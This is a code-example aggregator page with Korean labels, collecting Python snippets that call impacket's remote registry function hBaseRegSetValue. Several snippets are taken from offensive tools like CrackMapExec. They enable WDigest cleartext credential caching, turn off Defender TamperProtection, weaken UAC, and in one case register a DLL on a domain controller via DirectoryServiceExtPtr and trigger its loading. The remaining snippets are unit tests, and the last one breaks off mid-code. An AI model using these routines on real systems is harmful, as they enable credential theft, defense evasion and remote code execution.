예제 #1
0
    def enable(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        self.rrp = remoteOps._RemoteOperations__rrp

        if self.rrp is not None:
            ans = rrp.hOpenLocalMachine(self.rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(
                self.rrp, regHandle,
                'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
            )
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00',
                                 rrp.REG_DWORD, 1)

            rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle,
                                                 'UseLogonCredential\x00')

            if int(data) == 1:
                self.logger.success(
                    'UseLogonCredential registry key created successfully')

        try:
            remoteOps.finish()
        except:
            pass
예제 #2
0
파일: rdp.py 프로젝트: zyayaa/CrackMapExec 
    def rdp_disable(self, context, smbconnection):
        remoteOps = RemoteOperations(smbconnection, False)
        remoteOps.enableRegistry()

        if remoteOps._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(
                remoteOps._RemoteOperations__rrp, regHandle,
                'SYSTEM\\CurrentControlSet\\Control\\Terminal Server')
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle,
                                 'fDenyTSConnections\x00', rrp.REG_DWORD, 1)

            rtype, data = rrp.hBaseRegQueryValue(
                remoteOps._RemoteOperations__rrp, keyHandle,
                'fDenyTSConnections\x00')

            if int(data) == 1:
                context.log.success('RDP disabled successfully')

        try:
            remoteOps.finish()
        except:
            pass
예제 #3
0
    def wdigest_enable(self, context, smbconnection):
        remoteOps = RemoteOperations(smbconnection, False)
        remoteOps.enableRegistry()

        if remoteOps._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(
                remoteOps._RemoteOperations__rrp, regHandle,
                'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
            )
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle,
                                 'UseLogonCredential\x00', rrp.REG_DWORD, 1)

            rtype, data = rrp.hBaseRegQueryValue(
                remoteOps._RemoteOperations__rrp, keyHandle,
                'UseLogonCredential\x00')

            if int(data) == 1:
                context.log.success(
                    'UseLogonCredential registry key created successfully')

        try:
            remoteOps.finish()
        except:
            pass
예제 #4
0
def start(remoteName, remoteHost, username, password, dllPath):

    winreg_bind = r'ncacn_np:445[\pipe\winreg]'
    hRootKey = None
    subkey = None
    rrpclient = None

    print("[*] Connecting to remote registry")

    try:
        rpctransport = transport.SMBTransport(remoteHost, 445, r'\winreg',
                                              username, password, "", "", "",
                                              "")
    except (Exception) as e:
        print("[x] Error establishing SMB connection: %s" % e)
        return

    try:
        # Set up winreg RPC
        rrpclient = rpctransport.get_dce_rpc()
        rrpclient.connect()
        rrpclient.bind(rrp.MSRPC_UUID_RRP)
    except (Exception) as e:
        print("[x] Error binding to remote registry: %s" % e)
        return

    print("[*] Connection established")
    print(
        "[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPtr"
    )

    try:
        # Add a new registry key
        ans = rrp.hOpenLocalMachine(rrpclient)
        hRootKey = ans['phKey']
        subkey = rrp.hBaseRegOpenKey(
            rrpclient, hRootKey, "SYSTEM\\CurrentControlSet\\Services\\NTDS")
        rrp.hBaseRegSetValue(rrpclient, subkey["phkResult"],
                             "DirectoryServiceExtPt", 1, dllPath)
    except (Exception) as e:
        print("[x] Error communicating with remote registry: %s" % e)
        return

    print("[*] Registry value created, DLL will be loaded from %s" % (dllPath))

    trigger_samr(remoteHost, username, password)

    print("[*] Removing registry entry")

    try:
        rrp.hBaseRegDeleteValue(rrpclient, subkey["phkResult"],
                                "DirectoryServiceExtPt")
    except (Exception) as e:
        print("[x] Error deleting from remote registry: %s" % e)
        return

    print("[*] All done")
예제 #5
0
    def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
        dce, rpctransport, phKey = self.connect()
        resp = rrp.hOpenClassesRoot(dce)
        resp.dump()
        regHandle = resp['phKey']

        resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
        resp.dump()
        phKey = resp['phkResult']

        try:
            resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ,
                                        'HOLA COMO TE VA\x00')
            resp.dump()
        except Exception as e:
            print(e)

        type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
        #print data

        resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
        resp.dump()

        resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
        resp.dump()
        self.assertTrue('HOLA COMO TE VA\x00' == data)
예제 #6
0
    def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
        dce, rpctransport, phKey = self.connect()
        resp = rrp.hOpenClassesRoot(dce)
        resp.dump()
        regHandle = resp['phKey']

        resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
        resp.dump()
        phKey = resp['phkResult']

        try: 
            resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00',  rrp.REG_SZ, 'HOLA COMO TE VA\x00')
            resp.dump()
        except Exception as e:
            print e

        type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
        #print data

        resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
        resp.dump()

        resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
        resp.dump()
        self.assertTrue( 'HOLA COMO TE VA\x00' == data )
예제 #7
0
    def disableTamper(self, dce):
        #
        try:
            ans = rrp.hOpenLocalMachine(
                dce)  # gets handle for HKEY_LOCAL_MACHINE
            regHandle = ans['phKey']
        except Exception as e:
            logging.debug('Exception thrown when hOpenLocalMachine: %s',
                          str(e))
            return

        try:
            resp = rrp.hBaseRegCreateKey(
                dce, regHandle,
                'SOFTWARE\\Microsoft\\Windows Defender\\Features')
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s',
                          str(e))
            return

        # TamperProtection
        try:
            resp = rrp.hBaseRegSetValue(dce, keyHandle, 'TamperProtection\x00',
                                        rrp.REG_DWORD, 0)
            self.logger.highlight(
                'TamperProtection Key Set! TamperProtection is now off!')
        except Exception as e:
            logging.debug(
                'Exception thrown when hBaseRegSetValue EnableLUA: %s', str(e))
            self.logger.error('Could not set TamperProtection Key')
            pass
예제 #8
0
    def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
        dce, rpctransport = self.connect()
        resp = rrp.hOpenClassesRoot(dce)
        resp.dump()
        regHandle = resp['phKey']

        resp = rrp.hBaseRegCreateKey(dce, regHandle, self.test_key)
        resp.dump()
        phKey = resp['phkResult']

        try:
            resp = rrp.hBaseRegSetValue(dce, phKey, self.test_value_name,
                                        rrp.REG_SZ, self.test_value_data)
            resp.dump()
        except Exception as e:
            print(e)

        type, data = rrp.hBaseRegQueryValue(dce, phKey, self.test_value_name)

        resp = rrp.hBaseRegDeleteValue(dce, phKey, self.test_value_name)
        resp.dump()

        resp = rrp.hBaseRegDeleteKey(dce, regHandle, self.test_key)
        resp.dump()
        self.assertEqual(self.test_value_data, data)
예제 #9
0
    def enableUAC(self, dce):
        # this actually disables UAC but the key is enable....
        try:
            ans = rrp.hOpenLocalMachine(dce)
            regHandle = ans['phKey']
        except Exception as e:
            logging.debug('Exception thrown when hOpenLocalMachine: %s',
                          str(e))
            return

        try:
            resp = rrp.hBaseRegCreateKey(
                dce, regHandle,
                'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
            )
            keyHandle = resp['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s',
                          str(e))
            return

        # EnableLUA
        try:
            resp = rrp.hBaseRegSetValue(dce, keyHandle, 'EnableLUA\x00',
                                        rrp.REG_DWORD, 0)
            self.logger.highlight('EnableLUA Key Set!')
        except Exception as e:
            logging.debug(
                'Exception thrown when hBaseRegSetValue EnableLUA: %s', str(e))
            self.logger.error('Could not set EnableLUA Key')
            pass

        # LocalAccountTokenFilterPolicy
        try:
            resp = rrp.hBaseRegSetValue(dce, keyHandle,
                                        'LocalAccountTokenFilterPolicy\x00',
                                        rrp.REG_DWORD, 1)
            self.logger.highlight('LocalAccountTokenFilterPolicy Key Set!')
        except Exception as e:
            logging.debug(
                'Exception thrown when hBaseRegSetValue LocalAccountTokenFilterPolicy: %s',
                str(e))
            self.logger.error(
                'Could not set LocalAccountTokenFilterPolicy Key')
            return
예제 #10
0
    def add(self, dce, keyName):
        hRootKey, subKey = self.__strip_root_key(dce, keyName)

        # READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY should be equal to KEY_WRITE (0x20006)
        if self.__options.v is None: # Try to create subkey
            subKeyCreate = subKey
            subKey = '\\'.join(subKey.split('\\')[:-1])

            ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,
                                       samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)

            # Should I use ans2?

            ans3 = rrp.hBaseRegCreateKey(
                dce, hRootKey, subKeyCreate,
                samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY
            )
            if ans3['ErrorCode'] == 0:
                print('Successfully set subkey %s' % (
                    keyName
                ))
            else:
                print('Error 0x%08x while creating subkey %s' % (
                    ans3['ErrorCode'], keyName
                ))

        else: # Try to set value of key
            ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,
                                       samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)


            dwType = getattr(rrp, self.__options.vt, None)

            if dwType is None or not self.__options.vt.startswith('REG_'):
                raise Exception('Error parsing value type %s' % self.__options.vt)

            #Fix (?) for packValue function
            if dwType in (
                rrp.REG_DWORD, rrp.REG_DWORD_BIG_ENDIAN, rrp.REG_DWORD_LITTLE_ENDIAN,
                rrp.REG_QWORD, rrp.REG_QWORD_LITTLE_ENDIAN
            ):
                valueData = int(self.__options.vd)
            else:
                valueData = self.__options.vd

            ans3 = rrp.hBaseRegSetValue(
                dce, ans2['phkResult'], self.__options.v, dwType, valueData
            )

            if ans3['ErrorCode'] == 0:
                print('Successfully set key %s\\%s of type %s to value %s' % (
                    keyName, self.__options.v, self.__options.vt, valueData
                ))
            else:
                print('Error 0x%08x while setting key %s\\%s of type %s to value %s' % (
                    ans3['ErrorCode'], keyName, self.__options.v, self.__options.vt, valueData
                ))
예제 #11
0
    def wdigest_enable(self, context, smbconnection):
        remoteOps = RemoteOperations(smbconnection, False)
        remoteOps.enableRegistry()

        if remoteOps._RemoteOperations__rrp:
            ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00',  rrp.REG_DWORD, 1)

            rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00')

            if int(data) == 1:
                context.log.success('UseLogonCredential registry key created successfully')

        try:
            remoteOps.finish()
        except:
            pass
예제 #12
0
    def enable(self):
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        self.rrp = remoteOps._RemoteOperations__rrp

        if self.rrp is not None:
            ans = rrp.hOpenLocalMachine(self.rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
            keyHandle = ans['phkResult']

            rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00',  rrp.REG_DWORD, '\x01\x00')

            rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')

            if int(data) == 1:
                self.logger.success('UseLogonCredential registry key created successfully')

        try:
            remoteOps.finish()
        except:
            pass
예제 #13
0
    def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
        dce, rpctransport, phKey = self.connect()
        resp = rrp.hOpenClassesRoot(dce)
        #resp.dump()
        regHandle = resp['phKey']

        resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
        #resp.dump()
        phKey = resp['phkResult']

        try:
            resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ,
                                        'HOLA COMO TE VA\x00')
            #resp.dump()
        except Exception, e:
            print e